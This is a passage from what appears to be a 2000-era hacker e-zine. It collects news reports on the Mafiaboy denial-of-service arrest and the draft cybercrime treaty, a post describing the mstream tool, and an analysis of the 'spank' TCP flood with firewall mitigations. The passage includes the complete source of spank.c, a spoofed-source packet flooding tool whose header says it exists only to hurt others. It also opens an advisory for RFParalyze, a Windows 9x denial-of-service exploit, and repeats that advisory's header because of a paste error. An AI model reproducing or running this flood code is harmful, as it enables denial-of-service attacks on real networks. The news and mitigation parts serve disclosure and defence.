research lab that was among those used to attack CNN.com. A
hacker electronically broke into the UCSB computer on Feb. 8 and
instructed it to send large amounts of traffic to CNN.com's Web site,
ABC quoted campus network program Kevin Schmidt as saying.
Jeffrey Johnson, chief executive of Meta Secure-com Solutions, an
Atlanta-based electronic commerce security firm, said that in such
Web attacks, hackers usually use several ''zombie'' computers to
which they had already illegally gained remote control to flood the
target site with incoming streams of nuisance data.
Johnson said Mafiaboy had been well known in the hacker
underground and in a popular Internet chat room for about two years.
Mafiaboy stood out from others because he often bragged in the
online chat room about how he planned to take down a few Web
sites.
``He was looking for bragging rights. He was doing it to show that he
has power,'' Johnson said.
Click here for current stock quotes: TWX YHOO AMZN
EBAY BUYX ATHM EGRP
RTR/NEWS-TECH-ARREST/
Copyright � 2000 Reuters Limited. All rights reserved. Republication
or redistribution of Reuters content, including by framing or similiar
means, is expressly prohibited without the prior written consent of
Reuters. Reuters shall not be liable for any errors or delays in
the content, or for any actions taken in reliance thereon. All active
hyperlinks have been inserted by AOL.com.
@HWA
11.1 Mafiaboy:Canadian Arrest Made in February Web Attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://abcnews.go.com/wire/US/reuters20000419_1950.html
WIRE:04/19/2000 10:10:00 ET
Canadian Arrest Made in
February Web Attacks
MONTREAL (Reuters) - Canadian
police were set to reveal details on
Wednesday of an arrest made in
connection with February's cyber
attacks that jammed some of the
Internet's most popular Web sites, amid
reports the suspect is a 15-year-old
known online as Mafiaboy.
The Royal Canadian Mounted Police said on Tuesday
that charges had been brought against what they
described only as "a person" in the cyber attacks.
"The investigation has given authorities the opportunity to
bring light on Internet attacks that have strongly shaken
the heart of electronic commerce worldwide, causing
losses that were evaluated at many hundred millions of
U.S. dollars," the force said in a statement.
The "denial-of-service" attacks on Feb. 2 shut down such
popular Web sites as Yahoo! (YHOO.O), Amazon.com
(AMZN.O) and eBay (EBAY.O) for hours.
In the assault, attackers meticulously obtained remote
control of over computers around the world. They then
used the computers to bombard the targeted Web sites,
flooding them with so much data that legitimate users
were temporarily denied access or service.
The Mounties declined to comment further on the arrest,
but ABC News reported on Tuesday that a 15-year-old
boy who used the online moniker Mafiaboy was arrested
over the weekend in the Montreal area and charged on
Monday.
The news division of the U.S. television network said
records in the case had been sealed because of the
suspect's age. Under Canada's Young Offenders Act,
authorities are not allowed to reveal the identities of
individuals less than 17 years of age who are charged
with crimes and set to be tried in juvenile court.
The Canadian police promised to release more
information at a news conference in Montreal at 10:30
a.m. EDT (1430 GMT) on Wednesday.
The U.S. Justice Department and the FBI were expected
to make a statement afterward. No comment was
immediately available from the department.
The Mounties said their investigation included their
Computer Investigation and Support Unit in Montreal, a
division of the FBI, the U.S. Justice Department and U.S.
National Infrastructure Protection Center. Canadian
police joined the hunt for the hackers in mid-February as
investigators suspected that a Canadian server had been
used in the assault.
The February attacks alarmed Internet users across the
globe, cost Web sites millions of dollars in revenue and
shook the electronic commerce industry because of the
apparent ease with which major sites were made
inaccessible.
ABC said investigators were allegedly able to trace the
attacks to Mafiaboy by examining the log files of a
computer at a University of California, Santa Barbara,
research lab that was among those used to attack
CNN.com (TWX.N).
A hacker electronically broke into the UCSB computer
on Feb. 8 and instructed it to send large amounts of
traffic to CNN.com's Web site, ABC quoted campus
network programmer Kevin Schmidt as saying.
ABC News said the FBI obtained chat room logs
allegedly showing that Mafiaboy had asked others what
sites he should take down before they were attacked.
Internet security expert Michael Lyle told the network he
had communicated with Mafiaboy and the 15-year-old
said he had attacked not only CNN.com but also
E+TRADE and several smaller Web sites.
A subscriber called Mafiaboy previously held two
accounts with Delphi Supernet, a Montreal Internet
service provider that Toronto-based ISP Internet Direct
bought last year.
The accounts were closed in March 1998 because
Mafiaboy violated subscriber policies, but Internet Direct
would not say what the violations were.
@HWA
11.2 Mafiaboy:Reno Says 'Mafiaboy' Hacker Must Face Punishment
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://my.aol.com/news/story.tmpl?table=n&cat=01&id=0004190119676550
Reno Says 'Mafiaboy' Hacker Must Face Punishment
Reuters
Apr 19 2000 1:19PM ET
WASHINGTON (Reuters) - U.S. Attorney General Janet Reno said
on Wednesday a 15-year-old boy arrested in Canada for jamming
the CNN.com Web site and other sites in February must face
punishment.
Canadian police in Montreal announced charges against the
15-year-old hacker known online as ``Mafiaboy'' for jamming the
CNN.com Web site and up to 1,200 CNN-hosted sites for four
hours on Feb. 8.
``I think that it's important first of all that we look at what we've seen
and let young people know that they are not going to be able to get
away with something like this scot-free,'' Reno told reporters on
Capitol Hill. ``There has got to be a remedy, there has got to be a
penalty.''
Reno said the U.S. government continued to work with industry on
that incident and others, now that law enforcement has shown it can
crack cyber-attack cases.
``I believe this recent breakthrough demonstrates our capacity to
track down those who would abuse this remarkable new technology,
and track them down wherever they may be,'' she said.
@HWA
11.3 Mafiaboy:FBI Has Evidence That He and Others Launched Web Attacks,
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://more.abcnews.go.com/sections/tech/dailynews/webattacks000216.html
�Mafiaboy� Suspected FBI Has Evidence That He and Others Launched
Web Attacks, Expert Says
A customer peruses computer wares for sale at a hacker convention. The FBI
is questioning hackers, computer security experts and others who might
have information on last week's Web attacks. (Lori Cain/AP Photo)
By Jonathan Dube
Feb. 16 � A hacker who calls himself �mafiaboy� is believed to be
responsible for at least two of the attacks on leading Web sites, a
security expert tells ABCNEWS.com. FBI seeks hackers in Web attacks.
Chat room logs now in the possession of the FBI show that �mafiaboy�
asked others what sites he should take down � before the sites were
attacked, Internet security expert Michael Lyle said. In a
later conversation with Lyle, mafiaboy claimed credit for attacking
CNN.com, E*TRADE and several smaller sites, and he shared technical
information that only someone involved in the attacks would know,
Lyle said. The FBI now has reason to believe that the attacks last
week that took down seven leading Web sites and at least six smaller
Web sites were launched by several people, acting independently.
Mafiaboy, who has been described as a 15-year-old Canadian, is
believed to be a copycat who launched his attacks only after Yahoo!
was knocked offline on Feb. 7. Mafiaboy�s Claims Seem Credible Dozens
of hackers have claimed credit for the attacks in online chats, but
Lyle says mafiaboy is the only one so far who appears to be credible.
�Mafiaboy was saying �What should I hit next? What should I hit
next?� and people on the channel were suggesting sites, and mafiaboy
was saying, �OK, CNN,�� said Lyle, the chief technology officer for
Recourse Technologies Inc., an Internet security company in Palo
Alto, Calif. �And shortly thereafter the people on the channel would
be talking about CNN going down. If you look at the time stamps on
the logs, they also coincide with CNN going down.� Lyle said the log
files show similar discussions prior to the Feb. 9 attacks on E*TRADE
and several other smaller sites. Chat room log files can be faked,
but Lyle said he�s spoken with a number of others who witnessed the
conversations live and verified their authenticity.
Mafiaboy Knows Details Moreover, Lyle said he spoke with mafiaboy
over the Internet last Thursday and again last Friday and those
conversations bolstered the evidence against the young hacker. Mafiaboy
also said he was breaking into computers that were using a program called
WUFTP, which is often used to exchange data on university computers, Lyle
said. Mafiaboy said these computers were using an old version of WUFTP
that had security flaws in it and thus he was able to install the attack
software on the computers, Lyle said. He is believed to have installed
attack software called Tribal Flood Network, or TFN, on dozens of
computers, making them into �zombies� that he could then instruct to
launch the attacks. Lyle said mafiaboy told him specific details about the
ports that he used to connect with the zombie computers and launch the
attacks � information that only someone involved in the attack would know.
More Than One Attacker The reason investigators believe different
culprits were responsible for some of the attacks is that the software
tools used to launch the attacks on Yahoo! and eBay were different than
those used to attack CNN.com and E*TRADE, Lyle said. The attacks on
CNN.com and E*TRADE are believed to have been launched using TFN, a
software program that�s widely available on the Internet. The attacks on
Yahoo! and eBay were launched using a more sophisticated set of tools, he
said. Toronto-based Internet service provider Internet Direct said the
Royal Canadian Mounted Police had warned it that a subscriber called
�mafiaboy� previously held two accounts with Delphi Supernet, a Montreal
ISP the company bought last year. The accounts were closed in March 1998
because mafiaboy violated subscriber policies, but Internet Direct would
not say what the violations entailed. Lyle says he has turned his
information over to the FBI and has been working with investigators. Based
on his conversations with mafiaboy, Lyle said the teen likely committed
the attacks to boost his notoriety within the hacker community. �There�s
this real effort among the people on all these channels to try and stand
out and look like the best hacker, or one of the best,� Lyle said. �And I
think that that�s what he was searching after. That really explains why he
would brag the way he did about it.�
FBI Interviews �Coolio� ABCNEWS has also learned that the FBI has
interviewed a hacker called �coolio� in connection with last week�s Web
attacks, but he denied any involvement. FBI officials told ABCNEWS� Brian
Ross they had tracked down the teenage hacker in Southern California
because they believed he might have useful information for their
investigation. Coolio is well known to authorities as a member of �Global
Hell,� a group of teenagers who have hacked into White House and
Department of Defense computer systems. The officials said members of
Global Hell are still under investigation in connection with last week�s
Web attacks. The FBI also wants to question a hacker known as �nachoman.�
Officials have been careful to say they are not suspects, but just want to
talk to them about important information relating to the attacks.
Fast-Developing Leads In Washington, FBI Director Louis Freeh said
today investigators are running down hundreds of leads related to the Web
attacks, but still face substantial hurdles. �There are fast developing
leads as we speak,� Freeh told a Senate subcommittee. Freeh said the
investigation has led the FBI to at least four other countries, including
Canada and Germany. He also said FBI field offices in five cities are
participating in the investigation: Los Angeles, San Francisco, Atlanta,
Boston and Seattle. The FBI began investigating after leading Web portal
Yahoo! was attacked and made inaccessible for several hours on Feb. 7.
Then, on Feb. 8, Buy.com, Amazon.com, eBay and CNN.com were assaulted. And
on Feb. 10, technology site ZDNet and online trading site E*TRADE suffered
attacks. As many as 13 Web sites may have been attacked. Known as
denial-of-service attacks, the assaults effectively overloaded Web sites
with mock traffic so that real users couldn�t access the sites. The
culprits took over computers in various parts of the world and used them
to bombard the victims� sites with data. Investigators have located more
than a half-dozen computers used in last week�s attacks. Computers at two
California universities, a Midwestern school, a Berlin university, a
non-university site in Southern California, a home business in Oregon, and
machines at least four companies were used as �zombies.�
@HWA
11.4 Mafiaboy:Hacker cripples Area 51 site for 36 hours
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
04/21/00- Updated 11:36 AM ET
Hacker cripples Area 51 site for 36 hours
RALEIGH, N.C. (AP) - A hacker disrupted service for 36 hours to the Web
site that displays detailed satellite images of Area 51, the top-secret
Air Force site in Nevada.
Raleigh-based Aerial Images Inc. said the hacker struck six hours after
five images of the desert proving ground were loaded Monday night onto the
site, www.terraserver.com.
The attack, combined with traffic 10 times what the site usually bears,
meant millions of people had difficulty accessing the site or could not
connect with it at all, company officials said. Service was disrupted
until Thursday.
''I won't tell you it's completely solved,'' said John Hoffman, Aerial
Images president. ''We've taken steps to mitigate its effect. It's almost
a fact of being online these days.''
Hoffman declined to provide details of the attack, citing an ongoing
investigation.
The Air Force only recently acknowledged that Groom Dry Lake Air Force
Base even exists. Among UFO aficionados, it has long been known simply as
Area 51, the base's designation on old Nevada test site maps. They believe
that unidentified flying objects from other worlds are hidden there.
@HWA
xx.x [ISN] Clearing up questions about denial of service attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[Forwarded by: Mark Arena <marena@iinet.net.au>]
Hi all,
I just thought I'd clear up all these rumors, questions etc regarding
the denial of service attacks which happened a while ago.
1) Did mafiaboy use trinoo or smurf?
He didnt use either. He used a program called mstream and yes its
private. It basically is similar to trinoo. It comprises of a client
and a server. With the server it listens on port 7983 and you specify
the hosts which will connect to the server on that port. For that
reason you must have been added to the server to packet from it. On
the server.c program is appears like this:
char *m[]={
"1.1.1.1", /* first master */
"2.2.2.2", /* second master */
"3.3.3.3", /* third master etc */
0 };
Now as for the client you can define a password, serverfile and max
number of users to use the client at one time. The client then
connects to the servers and gets the servers to send all crap data to
the host you specify and hence if you got enough servers will take
them down eg as mafiaboy did.
2) So did mafiaboy actully hack anything?
The answer is yes. All the machine he installed the server on he had
to have root. Therefore he must have hacked a lot of machines in
preparation for the attack on the sites.
3) Did mafiaboy take out all the sites?
No, mafiaboy only took out yahoo, etrade and some others which I cant
remember. Coolio took out the rest. No matter what you're told I
assure you Coolio took out the rest.
4) How come it took so long for mafiaboy to get arrested?
Simple he hanged low and the fbi etc had not enough evidence to make
an arrest that was until his outburst on self-evident's msg board. His
allowed the fbi etc to swoop swiftly and quickly.
Now its time for my opinion:
1) Do you think mafiaboy will get convicted?
Well it depends, if mafiaboy admits to dos'ing those sites then yes I
believe he will be convicted then again if he denies it I believe they
won't have enough evidence on him. The only reason they caught him is
that his nick etc was posted on www.self-evident.com He also said to a
person I know that he destroyed the hard drive in a fire which would
give the fbi no physical evidence at his end.
Mafiaboy's story:
Here is a quick rephraze of what mafiaboy has said in channels before
he got arrested. His nick has been edited out for various reasons.
<> god fucking damnit
<> i wish i can go back in time
<> and undo what i did
In closing I'll tell you how I know this. Firstly I have spoken to
people associated with mafiaboy. I also have the program which he used
to take out the sites and no I won't send you it. Any other questions
etc direct them to me and i'll try answering them.
-------------------------------------------------------
Mark Arena marena@iinet.net.au
-------------------------------------------------------
@HWA
13.0 [MM] Cybercrime Solution Has Bugs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.wired.com/news/politics/0,1283,36047,00.html
Cybercrime Solution Has Bugs
by Declan McCullagh
3:00 a.m. May. 3, 2000 PDT
WASHINGTON -- U.S. and European police agencies will receive new powers to
investigate and prosecute computer crimes, according to a preliminary
draft of a treaty being circulated among over 40 nations.
The Council of Europe's 65KB proposal is designed to aid police in
investigations of online miscreants in cases where attacks or intrusions
cross national borders.
But the details of the "Draft Convention on Cybercrime" worry U.S. civil
libertarians. They warn that the plan would violate longstanding privacy
rights and grant the government far too much power.
The proposal, which is expected to be finalized by December 2000 and
appears to be the first computer crime treaty, would:
Make it a crime to create, download, or post on a website any
computer program that is "designed or adapted" primarily to gain
access to a computer system without permission. Also banned is
software designed to interfere with the "functioning of a
computer system" by deleting or altering data.
Allow authorities to order someone to reveal his or her passphrase
for an encryption key. According to a recent survey, only Singapore
and Malaysia have enacted such a requirement into law, and experts
say that in the United States it could run afoul of
constitutional protections against self-incrimination.
Internationalize a U.S. law that makes it a crime to possess even
digital images that "appear" to represent children's genitals or
children engaged in sexual conduct. Linking to such a site also would
be a crime.
Require websites and Internet providers to collect information about
their users, a rule that would potentially limit anonymous remailers.
U.S. law enforcement officials helped to write the document, which was
released for public comment last Thursday, and the Justice Department is
expected to urge the Senate to approve it next year. Other non-European
countries actively involved in negotiations include Canada, Japan,
and South Africa.
During recent testimony before Congress, Attorney General Janet Reno
warned of international computer crime, a claim that gained more
credibility last month with the arrest of alleged denial-of-service
culprit Mafiaboy in Canada.
"The damage that can be done by somebody sitting halfway around the world
is immense. We have got to be able to trace them, and we have made real
progress with our discussions with our colleagues in the G-8 and in the
Council of Europe," Reno told a Senate appropriations subcommittee
in February, the week after the denial-of-service attacks took place.
"Some countries have weak laws, or no laws, against computer crimes,
creating a major obstacle to solving and to prosecuting computer crimes. I
am quite concerned that one or more nations will become 'safe havens' for
cyber-criminals," Reno said.
Civil libertarians say the Justice Department will try to pressure the
Senate to approve the treaty even if it violates Americans' privacy
rights.
"The Council of Europe in this case has just been taken over by the U.S.
Justice Department and is only considering law enforcement demands," says
Dave Banisar, co-author of The Electronic Privacy Papers. "They're using
one more international organization to launder U.S. policy."
Banisar says Article 6 of the measure, titled "Illegal Devices," could ban
commonplace network security tools like crack and nmap, which is included
with Linux as a standard utility. "Companies would be able to criminalize
people who reveal security holes about their products," Banisar
said.
"I think it's dangerous for the Internet," says Barry Steinhardt,
associate director of the American Civil Liberties Union and a founder of
the Global Internet Liberty Campaign. "I think it will interfere with the
ability to speak anonymously."
"It will interfere with the ability of hackers -- using that term in a
favorable light -- to test their own security and the security of others,"
Steinhardt said.
Solveig Singleton, director of information studies at the libertarian Cato
Institute says it's likely -- although because of the vague language not
certain -- that anonymous remailers will be imperiled.
The draft document says countries must pass laws to "ensure the
expeditious preservation of that traffic data, regardless whether one or
more service providers were involved in the transmission of that
communication." A service provider is defined as any entity that
sends or receives electronic communications.
Representing the U.S. in the drafting process is the Justice Department's
Computer Crime and Intellectual Property section, which chairs the G-8
subgroup on high-tech crime and also is involved with a cybercrime project
at the Organization of American States. In December 1997 Reno
convened the first meeting on computer crime of the G-8 nations.
A recent White House working group, which includes representatives from
the Justice Department, FBI, and Secret Service has called for
restrictions on anonymity online, saying it can provide criminals with an
impenetrable shield. So has a report from a committee of the
European Parliament.
Other portions of the treaty include fairly detailed descriptions of
extradition procedures and requirements for countries to establish
around-the-clock computer-crime centers that police groups in other
countries may contact for immediate help.
The Council of Europe is not affiliated with the European Union, and
includes over 40 member nations, including Russia, which joined in 1996.
After the Council of Europe's expert group finalizes the proposed treaty,
the full committee of ministers must adopt the text. Then it will be sent
to countries for their signatures. Comments can be sent to daj@coe.int.
@HWA
14.0 [IND] The new spank.c DoS attack tool source and an analysis paper by 1st
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
------------------------------------------------
Explanation of the 'spank' attack
-- a new breed stream/raped
------------------------------------------------
By: lst (yardley@uiuc.edu)
This is a tad different than the previous release. Stream/Raped mearly
flooded the host with ack's (or no flags) and came from random ips with
random sequence numbers and/or ack numbers. The difference now is that
this not only does the previous stuff, but also directly attacks from and
to multicast addresses as well. Just as before, rate limiting should be
done to counteract its effect (the same idea as ICMP_BANDLIM). The
multicast handling should also be checked to verify that it is behaving
properly.
The attacker specifies the port[s] that they want to send the attack to,
depending on what ports are selected, you will have different net
results. If the port is an open port, then you will possibly have a longer
kernel path to follow before the drop. Therefore, a smart attacker will
hit open ports, but havoc can also come about from random ports due to
states and processing.
In the best case scenario, you will experience only the lag of the flood
and the lag of the processing (currently) and then be fine when the
attacker stops, In the worst case, you lockup, kill the network, and
possibly have to reboot. Once you patch it, you deal with a lot less
processing time (the drops are handled without the RST flag when
appropriate--bandlim type idea). In other words, you go to the drop
routine instead of dropwithrst silencing your response, which decreases
your processing time, the hit on your network, and the effect of the flood
(once a threshold is reached, all those bad packets are silently dropped
and the attack has less of a net effect).
The filters that were presented at the beginning of this email will block
all multicast packets that come out (and in) the tcp stack I have been
getting mailed a lot about this. Here is why I said the previous
statement. Receiving a packet with no flags is considered an illegal
packet (obviously) and is often dumped, however, as we have seen in
the past, illegal packets often wreak havoc and often go untested.
There is very little that "raped.c" or "stream.c" actually showed as
problems in the TCP/IP stacks. The true problem lies more in the effects
of the response (caused by the attack). This is the same concept as the
SYN floods of yesteryear, and the same type of thing will be done to handle
it. The main difference is that it will be on a simpler note because there
isn't much need for a "cookie" based system. One should just throttle the
response of the reset packets which in turn will help stop the storm that
you generate and in general, harden the tcp/ip stack to behave the way it
is supposed to.
The main effect of this attack is that you are shooting back RST+ACK's at
all the spoofed hosts. Obviously, a lot of these hosts will not exist and
you will get ICMP unreaches (as an example) bounced back at you. There are
other possibilities as well, but unreach would be the most common
(redirects might be common as well although i did not spend the time to
analyze that). The ones that don't respond back may send you some packets
back as well (depending on if the port was valid or not and what their
firewall rules are). This type of attack is complicated by the multicasts,
and the effect is amplified as well. All in all, it becomes very nasty
very quick. Basically, this causes a nice little storm of packets, in the
ideal case.
Note that I said ideal case in the previous paragraph. This is not always
the observed behavior. It all depends on what is on the subnet, what type
of packets are recieved, what rules and filters you have setup, and even
the duration of the flood. It has been pointed out several times that the
machine will go back to normal once the attack is stopped, which is exactly
why something like ICMP_BANDLIM will work.
I have also been asked a lot about what this "bug" affects. I have seen it
have effects on *BSD, Linux, Solaris, and Win* as far as OS's go. It has
also seemed to affect some hubs, switches, routers, or gateways since
entire subnets have "disappeared" briefly after the attack. The multicast
attack seems to be more deadly to teh network than the previous attack and
its affects get amplified and even carried over to the rest of the network
(bypassing secluded network bounds). I don't have more specifics on the
systems affected because of the difficulty in testing it (and keeping the
network up) since I do not have local access to the networks that I tested
on, and remote access gets real ugly real fast.
Another possibility that has been suggested as to why some machines die is
that the machine's route table is being blown up by the spoofed
packets. Each spoofed packet has a different source address which means
that a temporary route table entry is being created for each one. These
entries take time to timeout. Use 'vmstat -m' and check the 'routetbl'
field while the attack is going on.
Route table entries can be controlled somewhat under freebsd with:
[root@solid]::[~] sysctl -a | fgrep .rt
net.inet.ip.rtexpire: 3600
net.inet.ip.rtminexpire: 10
net.inet.ip.rtmaxcache: 128
You can do the following, to help if the route table is at least part of
the problem:
sysctl -w net.inet.ip.rtexpire=2
sysctl -w net.inet.ip.rtminexpire=2
Things that will help:
1. Drop all multicast packets (ingress and egress) that are addressed to
the tcp stack because multicasts are not valid for tcp.
2. Extend bandwidth limiting to include RST's, ACK's and anything else
that you feel could affect the stability of the machine.
3. Don't look for listening sockets if the packet is not a syn
I hope that this helps, or explains a little more at least.
---------------------------------------------------
Temporary remedy
---------------------------------------------------
If you use ipfilter, this MAY help you, but the issue is quite a bit
different than the previous issue.
-- start rule set --
block in quick proto tcp from any to any head 100
block in quick proto tcp from 224.0.0.0/28 to any group 100
pass in quick proto tcp from any to any flags S keep state group 100
pass out proto tcp from any to any flags S keep state
pass in all
-- end rule set --
optionally, a rule like the following could be inserted to handle outgoing
packets (if they send from the firewall somehow) but you have bigger
problems than the attack if that is the case.
-- start additional rule --
block out proto tcp from any to 224.0.0.0/28
-- end additional rule --
That will help you "stop" the attack (actually it will just help minimize
the affects), although it will still use some CPU though
Note: If you use IPFW, there is no immediate way to solve this problem due
to the fact that it is a stateless firewall. If you are getting attacked,
then temporarily use ipfilter (or any other state based firewall) to stop
it. Otherwise, wait for vendor patches or read more about the explanation
for other possible workarounds.
FreeBSD "unofficial patch" by Don Lewis:
http://solid.ncsa.uiuc.edu/~liquid/patch/don_lewis_tcp.diff
-----------------------
Conclusion
-----------------------
This bug was found in testing. It seems a bit more lethal than the
previous and should be addressed as such. Patches should be available now,
but I do not follow all the platforms.
--------------------
References
--------------------
This was done independantly, although some of the analysis and reverse
engineering of concept was done by other people. As a result, I would like
to give credit where credit is due. The following people contributed in
some way or another:
Brett Glass <brett@lariat.org>
Alfred Perlstein <bright@wintelcom.net>
Warner Losh <imp@village.org>
Darren Reed <avalon@coombs.anu.edu.au>
Don Lewis <Don.Lewis@tsc.tdk.com>
Also, I would like to send shouts out to w00w00 (http://www.w00w00.org)
-------------------
Attached
-------------------
These programs are for the sake of full disclosure, don't abuse
them. Spank was written with libnet, so you will need to obtain that as
well. You can find that at http://www.packetfactory.net/libnet
For an "unofficial" patch:
http://www.w00w00.org/files/spank/don_lewis_tcp.diff
For spank.c:
http://www.w00w00.org/files/spank/spank.c
-=-
/*
* spank.c by fred_ | blasphemy
*
* @@@@@@ @@@@@@@ @@@@@@ @@@ @@@ @@@ @@@
* @@@@@@@ @@@@@@@@ @@@@@@@@ @@@@ @@@ @@@ @@@
* !@@ @@! @@@ @@! @@@ @@!@!@@@ @@! !@@
* !@! !@! @!@ !@! @!@ !@!!@!@! !@! @!!
* !!@@!! @!@@!@! @!@!@!@! @!@ !!@! @!@@!@!
* !!@!!! !!@!!! !!!@!!!! !@! !!! !!@!!!
* !:! !!: !!: !!! !!: !!! !!: :!!
* !:! :!: :!: !:! :!: !:! :!: !:!
* :::: :: :: :: ::: :: :: :: :::
* :: : : : : : : :: : : :::
*
* This program is not for educational use
* in any shape or form. You must agree that
* you will only use it to hurt others.
*
* Warning, this program uses alot of bandwidth.
*
* usage: ./spank <source> <destination> <size>
*
*/
#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <sys/types.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/ip_icmp.h>
static int in_cksum(u_short *addr, int len);
static void fill(int datalen, char *icmp_data);
#define PHDR_LEN sizeof(struct icmphdr) + sizeof(struct iphdr)
static void
fill(int datalen, char *icmp_data)
{
static u_int32_t rnd;
int i;
for (i = PHDR_LEN; i < datalen; i++) {
rnd = (3141592621U * rnd + 663896637U);
icmp_data[i] = rnd>>24;
}
}
int
main(int argc, char *argv[])
{
int count = 0, sock, x;
struct sockaddr_in sin;
fprintf(stdout, "spank.c coded by fred_ | blasphemy\n");
if (argc != 4) {
fprintf(stderr,
"ex., %s <source> <destination> <size>\n",
argv[0]);
exit(1);
}
if (atoi(argv[3]) < 1) {
fprintf(stderr,
"error: packet size is too small.\n");
exit(1);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(0);
sin.sin_addr.s_addr = get_addr(argv[2]);
sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sock < 0) {
perror("socket()");
exit(1);
}
setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &x, sizeof(x));
printf("each '.' is 25 packets\n");
while (1) {
send_packet(argv[1],
atoi(argv[3]), sin, sock);
count++;
if (count == 25) {
printf(".");
fflush(stdout);
count = 0;
}
usleep(10);
}
}
int get_addr(char *host)
{
static struct in_addr h;
struct hostent *hp;
h.s_addr = inet_addr(host);
if (h.s_addr == -1) {
hp = gethostbyname(host);
if (hp == NULL) {
fprintf(stderr,
"unable to resolve %s.\n", host);
exit(1);
}
bcopy(hp->h_addr, (char *)&h.s_addr, hp->h_length);
}
return h.s_addr;
}
int send_packet(char *src, int size,
struct sockaddr_in sin, int sock)
{
char *packet;
struct icmphdr *icmp;
struct iphdr *ip;
packet = (char *) malloc(PHDR_LEN + size);
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
memset(packet, 0, PHDR_LEN);
fill(size, packet);
ip->tot_len = htons(PHDR_LEN + size);
ip->ihl = 5;
ip->ttl = 255;
ip->protocol = IPPROTO_ICMP;
ip->version = 4;
ip->tos = 0;
ip->frag_off = 0;
ip->saddr = get_addr(src);
ip->daddr = sin.sin_addr.s_addr;
ip->check = in_cksum((u_short *)ip,
sizeof(struct iphdr));
icmp->type = 8;
icmp->code = 1;
icmp->checksum = in_cksum((u_short *)icmp,
sizeof(struct icmphdr));
if (sendto(sock, packet, PHDR_LEN + size,
0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1) {
close(sock);
perror("sendto()");
exit(1);
}
free(packet);
}
static int
in_cksum(u_short *addr, int len)
{
register int nleft = len;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *addr++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *) (&answer) = *(u_char *) addr;
sum += answer;
}
sum = (sum >> 16) + (sum + 0xffff);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}
@HWA
15.0 [IND] RFParalyse.c:Cause undesired effects remotely against Win9x;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Source: http://www.wiretrip.net/rfp/
http://www.el8.org/adv/05012000_win98_winpopup.txt
--/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\--
/ /
/ e / - el8.org advisory
/ l /
/ 8 / - Evan Brewer <dm@el8.org>
/ . / - Rain Forest Puppy <rfp@wiretrip.net>
/ o /
/ r / - Synopsis: Cause undesired effects remotely against
/ g / win9[5,8] through an oddly formed winpopup message.
/ /
--/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\--
Details:
Through a netbios session request packet with a NULL source name,
Windows 9[5,8] show a number of odd responses. Everything from
lockups, reboots and "the blue screen of death", to total loss of
network connectivity.
Note that neither el8 or wiretrip discovered the vulnerability;
instead, a binary-only exploit found in the wild was reversed,
and the demonstration code attached was reconstructed. So it
should be noted:
THIS HAS BEEN FOUND IN THE WILD
The vulnerability specificly targets the Messenger service on
Windows 9[5,8]. At this point, it's doubtful there's anything
more worthy than a DoS capable. However, any information to the
contrary would be appreciated. :)
Source:
Attached is a quick hack called RFParalyze.c
Greets:
ADM / w00w00 / everyone at el8.org
--/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\--
/*********************************** www.el8.org **** www.wiretrip.net **/
/* - el8.org advisory: RFParalyze.c
code by rain forest puppy <rfp@wiretrip.net> -
coolness exhibited by Evan Brewer <dm@el8.org> -
:q
(n0where)[/home/sas] cat RFparalyse.txt
--/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\--
/ /
/ e / - el8.org advisory
/ l /
/ 8 / - Evan Brewer <dm@el8.org>
/ . / - Rain Forest Puppy <rfp@wiretrip.net>
/ o /
/ r / - Synopsis: Cause undesired effects remotely against
/ g / win9[5,8] through an oddly formed winpopup message.
/ /
--/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\--
Details:
Through a netbios session request packet with a NULL source name,
Windows 9[5,8] show a number of odd responses. Everything from
lockups, reboots and "the blue screen of death", to total loss of
network connectivity.
Note that neither el8 or wiretrip discovered the vulnerability;
instead, a binary-only exploit found in the wild was reversed,
and the demonstration code attached was reconstructed. So it
should be noted:
THIS HAS BEEN FOUND IN THE WILD
The vulnerability specificly targets the Messenger service on
Windows 9[5,8]. At this point, it's doubtful there's anything
more worthy than a DoS capable. However, any information to the
contrary would be appreciated. :)
Source:
Attached is a quick hack called RFParalyze.c
Greets:
ADM / w00w00 / everyone at el8.org
--/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\--
/*********************************** www.el8.org **** www.wiretrip.net **/
/* - el8.org advisory: RFParalyze.c
code by rain forest puppy <rfp@wiretrip.net> -
coolness exhibited by Evan Brewer <dm@el8.org> -
- Usage: RFParalyze <IP address> <NetBIOS name>
where <IP address> is the IP address (duh) of the target (note:
not DNS name). <NetBIOS name> is the NetBIOS name (again, duh) of
the server at the IP address given. A kiddie worth his scripts
should be able to figure out how to lookup the NetBIOS name.
